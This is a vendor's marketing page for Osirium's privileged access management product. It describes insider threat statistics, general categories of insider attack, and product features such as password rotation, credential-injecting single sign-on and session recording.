Osirium Manages Privileged Users, Privileged Accounts and their Passwords, and allows for the Delegation of Privileged Tasks
The changing face of Cyber Security
Securing IT Infrastructures in past times used to be a much simpler problem . . . businesses managed their own IT infrastructures and secured their own perimeter using point IT security solutions such as firewalls, email gateways, VPNs, proxies, etc. The bad guys were on the outside; simply put the Internet was the “wild-west” and all that organisations needed to do were to circle the wagons to keep out their enemies.
However, in today’s hybrid-cloud era, the privileged insider and outsider have become inter-changeable and the traditional idea of the security perimeter has dissolved, As a result, there has been an alarming increase in the numbers of Privileged Users, some of whom will have privileged powers far exceeding that needed to do their jobs.
These risks have huge potential for cyber-attack and corporate damage because Privileged Accounts provide a “golden” path for any person with unlimited power to compromise data and remain undetected for long periods of time. Organizations can significantly reduce the threat of targeted attacks by proactively securing privileged accounts against Advanced Persistent Threat (APT) attack cycles. According to CyberSheath’s APT Research Report, privileged accounts are increasingly being used in advanced and targeted attacks to compromise organizations and steal data.
- The Compromise of Privileged Accounts is a Crucial Factor in 100 % of Advanced Attacks
- Attacks That Use Privileged Accounts are More Difficult to Detect, Shut Down and Remediate
- Attacks That Exploit Privileged Accounts are More Damaging and Expensive
- Properly Secured Privileged Accounts Can Significantly Reduce APT Exposure
Privileged Accounts have become the most sought after target They enable attackers to erase their digital footprints, install back doors, erase logs, and gain access to highly sensitive information without being detected. Protecting these accounts has become the most critical Cyber-Security issue of today.
Many high-profile breaches, including those at RSA and the US Chamber of Commerce, have involved the exploitation of privileged or administrator accounts. For example, the Mandiant report in February 2013 into Chinese cyber-attacks against 141 organisations around the world showed that 90% involved the takeover of privileged accounts.
Osirium has Enterprise Class Password Management as one of the three foundation components
What are Privileged Users and Privileged Accounts?
All IT Infrastructures are operationally managed by skilled IT persons, who by virtue of function and/or seniority, have been given the use of Privileged Accounts which have powers within the computer system which are significantly greater than those available to the majority of users.
These individuals are known as Privileged Users because they need increased configuration powers to install, deploy, maintain IT assets, as well as creating new user profiles and adding to or amending the powers and access rights of other existing users. It’s these privileged powers which are becoming one of the most dangerous cyber-security threats in the corporate world. These risks are known as “Insider Threats” – i.e. Privileged Users with access to Privileged Accounts, having the capacity to unleash huge damage on companies.
Osirium has Enterprise Class Privileged Account Lifecycle Management as one of the three foundation components
The facts about “Insider Threats”
- Over 50% of business leaders see their own employees as a bigger threat to Cyber Security than external attackers, according to the survey ‘Boardroom Cyber Watch 2013′.
- Société Générale, a junior trader, Jerome Kerviel, used access rights from his former back-office role to carry out unauthorised trading, costing the company £3.6bn.
- NatWest service outage 2012 brought about by a deletion of the previous night’s batch run by a junior Sys Admin.
Verizon’s Data Breach Investigation revealed that;
- 48% data breaches were caused by insiders (+26% in 2010), and 70% of all incident detection notified by a 3rd party
- Price Waterhouse Cooper say that 82% of organisations they work with have insider issues and that 65% of them involved the abuse of privileged access.
- 86% of large enterprise organizations either do not know or have grossly underestimated the magnitude of their privileged account security problem, while more than half of them share privileged passwords internally, which only exacerbates the insider threat. Confidential data theft is often carried out by exploiting privileged account access. 65% of IT Managers and C-level professionals believe that the majority of recent security attacks have involved this type of access.
- 48% of cyber-attacks originate from inside the organisation.
- 65% of insider issues involve the abuse of privileged access.
- 60% of organisations cannot associate every privileged user action with an individual.
- 70% of organisations make uncontrolled changes prior to audits.
- 90% of organisations still guess the identities of devices, risking high error rates and catastrophic failures.
- Two out of every three privileged accounts in organizations are either unknown or unmanaged.
To minimize the risk associated with these accounts, organizations need to identify where these accounts exist, control access to them, and monitor exactly what is being done with them. Implementing a privileged account security solution to automate these processes helps organizations enforce these controls, while providing a clear audit trail for accountability and security. There are many types of “Insider” attacks, both malicious and unintentional:
- System sabotage: This type of attack is malicious in nature and usually consists of a disgruntled employee destroying data or rendering an operating system or applications unusable in some way.
- Theft of assets or data: Usually malicious, this attack can be very difficult to identify and may be one of the most damaging overall.
- Introduction of “bad code:” An attack of this nature may be deliberate or accidental (for example, by haplessly using poor coding practices or purchasing bad code). It is usually attributed to developers or other IT professionals who have access to code or scripts used by an organization. One example of this is the logic bomb coded into a program by a rogue developer at Fannie Mae.
- Introduction of malware: This is an attack that may not be deliberate in nature; many malware infections are unintentional. The higher the user’s privileges are, however, the more devastating the attack can be.
- Unauthorized hardware and software: By introducing wireless access points, USB storage devices, and unapproved software into an organization, insiders may introduce new threats and vulnerabilities to the environment.
- Social engineering: It is often said that the weakest link in the chain of security is people, and by exploiting them, insiders can easily bypass policies and controls. Such attacks may range from the innocent (talking an administrator into installing a software package a user wants) to malicious (a help desk analyst talking a user out of her password to gain access to her files or, more dangerously, company data).
- Accidents: Even accidental incidents by insiders have the potential to cause tremendous damage.
What does Osirium do?
- Cyber Security Protection for Privileged Accounts
- Securing 3rd Party Access in Hybrid Cloud Infrastructures
- Automating Privileged Tasks to reduce Costs and Risks
- Privileged Compliance for Visibility and Accountability
Osirium Privileged Access Management (PAM) protects SysAdmin environments from Privileged Cyber-Security threats by automating the password management life-cycle so that Privileged Account credentials cannot be stolen or hijacked, nor the passwords revealed during single sign-on, assigning privileges, provisioning and de-provisioning of devices.
Osirium further strengthens security by eradicating the reliance on shared or group accounts and, as a result, removing the complexity and confusion which can arise from managing shared passwords by creating unique and individual personalised accounts on each end system with the strongest passwords possible.
Osirium also removes any possibility of bypassing Osirium and hacking into the infrastructure with direct connections, since every privileged connection request has to pass via Osirium. In emergencies these accounts can always be accessed and used manually, while log files contain individual account information making it simple to identify exactly who has done what and when on end systems.
Osirium helps its customers drive down overhead costs by automating and delegating Privileged Tasks to alternative teams, such as the Help Desk, which makes better use of available resources and significantly reduces the risks of human-error. Furthermore, Blueprints can be created that set out the required settings for, say, PCI compliance which allows Osirium to schedule audits to identify compliance gaps and subsequently remediate those devices falling short, thereby helping organisations pro-actively meet and, more importantly, maintain compliance.
Session Shadowing and Recording is also available, which acts as general deterrent to malicious practitioners, enables device audit reviews, change management control and assessment, faster fault resolution and, ultimately, irrefutable evidence of privileged activities on devices and applications.
Cyber Security Protection for Privileged Accounts
Attack Vector 1 – Stopping illegal access directly into privileged accounts residing in applications and on devices.
Systems administrators, power users and generic accounts have their passwords compromised by illegal users & intruders, because they are weak or have become commonly known across multiple systems. Osirium provides a single protective layer in-between the estate and all users. The only way to access the estate is by signing into Osirium. It’s unlikely that even a brute force attack on an Osirium managed device would succeed due to the rolling & randomly generated passwords we put into place. Osirium therefore eliminates this aspect of the attack surface, namely direct access into privileged accounts.
Attack Vector 2 – Removing powers from privileged users not required for their role.
“48% of data breaches are caused by insiders” and 22% of these insider breaches were enabled by inappropriate or outdated privileged user access rights. Being more specific, these ‘incorrect rights’ breaches were categorised by CERT (the Computer Emergency Response Team at Carnegie Mellon University) into 1) over-privileged users; able to make changes outside their role & authority, and 2) unrevoked permissions; users no longer in the same role or still with the company. Osirium maps each user to specific role based accounts in the application or device. Users can now only perform activities for which they have express authorisation. If their role changes or they leave the organisation, no matter how many accounts they had access to, only one place needs to be updated, and that’s in Osirium.
Osirium therefore eliminates this aspect of the attack surface – over-privileged and legacy accounts.
Attack Vector 3 – Deterring legitimate users from abusing their role.
The balance of breaches caused by insiders is down to users with valid rights. Of these attacks, those with motives of financial gain, revenge & business advantage probably do not want to be caught, and those with motives of recognition, curiosity or ideology probably don’t care.
Osirium audits everything the user does, down to a video record of mouse movement and key-strokes. A bright red banner across the screen provides a permanent reminder that ‘for reasons of compliance’ session recording is active. Osirium eliminates this aspect of the attack surface, ie. getting away with an act of vandalism, sabotage or theft. Those with more fundamentalist motives are harder to stop, but Osirium can minimise the damage.
Attack Vector 4 – Containing a breach when it does happen.
With the best protection now in place, breaches should still be viewed as a possibility, although very unlikely, so when they do occur the priority has to shift from prevention, to investigation and remediation. Osirium is able to notify on any device or application access and all activity recorded during that session in near-real-time, providing information for review and enabling intelligent decision making for remediation and recovery. As a result, Osirium is able to help organisations minimise the damage of a breach by quickly closing the attack window, reducing data loss, while providing the visibility and intelligence to successfully mitigate the potential damage. The quicker an attack window is closed, the less data can be stolen and the fewer customers affected.
Securing 3rd Party Access in Hybrid Cloud Infrastructures
Whether the organisation’s infrastructure is on-premise, in the cloud or a hybridised mix of both, Osirium’s Privileged Management solution provides quick, secure access to all network and security devices with an automated single sign-on process through the Osirium Server, which proxy’s connections to the target system.
Osirium PAM is an agent-less solution requiring no additional software to be installed, configured and maintained on target devices and applications. This represents one of the critical design principles first defined at its inception; i.e. that of minimising disruption to working practices and simplicity of deployment.
Osirium PAM has been architected to support devices and applications from many different vendors and already supports a large number of diverse vendor equipment and applications. Extending support to additional devices, servers or applications is a simple matter of creating new XML knowledge templates, and clients are already creating their own templates, with full support and backing from the Osirium support team.
Each SysAdmin uses an Osirium Desktop Client which allows him to access all the systems he is required to manage, wherever they may reside in the infrastructure. The Desktop Client provides a list of devices the SysAdmin is allowed to access and a list of tasks he has been delegated to perform. There is also a “Google-like” search tool which provides rapid identification of the devices requiring privilege access. Osirium automatically creates unique local role-based accounts for each administrator on each device or application requiring access. These accounts are personalised with their logon details and the permission levels they own. Personalised Access on each device also means that the users cannot side-step or piggy back to other devices because that particular account is not valid.
When connecting to devices, Osirium PAM proxies connections directly and automatically injects the user’s credentials to perform a Single Sign-On. As a result, nobody ever sees or knows the passwords on any end devices, so the possibility of hacking credentials has been completely removed.
Conversely, whenever an administrator needs to be removed, Osirium automatically connects to all the administrator’s relevant devices and removes the account; thus automatically removing any possibility of dormant or legacy accounts from all the devices to which the administrator had access.
SuperAdmins can quickly and easily manage real-time SysAdmin accounts, username/passwords and privilege levels across multiple network devices, enabling management to enforce policy-based access controls. This eliminates the risk of unauthorised users accessing shared and un-secured passwords by removing the need for SysAdmins to remember static passwords for each and every device. Password renewal can be automated at specific time intervals for specific types of end systems or after specific events have taken place. Similarly, Osirium’s approach to Session Recording and Compliance Audits is granular and based on Osirium profiles. It can also be configured to align with our ‘Least Privileged’ deployment model, as opposed to having to operate a ‘catch all’ across all devices and users.